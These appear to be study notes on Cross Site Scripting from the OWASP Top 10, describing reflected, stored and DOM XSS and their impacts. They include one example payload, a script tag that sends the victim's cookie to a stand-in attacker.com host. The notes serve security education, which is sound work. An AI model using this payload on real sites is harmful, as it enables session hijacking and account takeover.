7.Cross Site Scripting (OWASP TOP 10)

 Cross Site Scripting

* 3 Types:

* Reflected XXS - A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim's browser , typically the user will need to interact with same malicious like that point  to an attacker-controlled page .

* Stored XSS - the application or API stores unsanitized user input that is viewed at a later time by another user or an administrator . stored XSS is often considered a high or critical risk .

* DOM XXS - JavaScript frameworks , single-page applications , and APIs that dynamically include attacker controllable   data to a page are vulnerable to dom xxs .

* Example scenario :

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+documnet.cookie</script>'

This causes the victim's session id to sent  to the attacker's website ,

attacker to hijack the user's current session .

* typical XXS attacks include session stealing , account take over , MFA bypass , DOM node replacement or defacement (such as trojan login panels),attacks against the user's browser such as malicious software downloads , key logging , and other client-side attacks .